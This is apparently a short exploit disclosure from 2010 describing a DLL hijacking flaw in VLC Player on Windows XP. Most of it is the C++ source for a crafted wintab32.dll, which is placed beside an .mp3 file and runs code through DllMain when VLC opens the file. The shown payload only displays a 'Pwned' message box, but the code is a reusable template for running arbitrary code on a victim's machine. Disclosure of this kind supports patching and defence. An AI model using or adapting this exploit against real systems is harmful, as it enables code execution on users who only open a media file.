46 lines
No EOL
750 B
Text
46 lines
No EOL
750 B
Text
Exploit Title: VLC Player DLL Hijack Vulnerability
|
|
Date: 25 Aug 2010
|
|
Author: Secfence
|
|
Version: VLC
|
|
Tested on: Windows XP
|
|
|
|
Place a .mp3 file and wintab32.dll in same folder and execute .mp3 file in
|
|
vlc player.
|
|
|
|
Code for wintab32.dll:
|
|
|
|
/*----------*/
|
|
|
|
/* wintab32.cpp */
|
|
|
|
#include "stdafx.h"
|
|
#include "dragon.h"
|
|
|
|
void init() {
|
|
MessageBox(NULL,"Pwned", "Pwned!",0x00000003);
|
|
}
|
|
|
|
|
|
BOOL APIENTRY DllMain( HANDLE hModule,
|
|
DWORD ul_reason_for_call,
|
|
LPVOID lpReserved
|
|
)
|
|
{
|
|
switch (ul_reason_for_call)
|
|
{
|
|
case DLL_PROCESS_ATTACH:
|
|
init();break;
|
|
case DLL_THREAD_ATTACH:
|
|
case DLL_THREAD_DETACH:
|
|
case DLL_PROCESS_DETACH:
|
|
break;
|
|
}
|
|
return TRUE;
|
|
}
|
|
|
|
/*----------*/
|
|
|
|
|
|
Exploit By:
|
|
Vinay Katoch
|
|
www.secfence.com |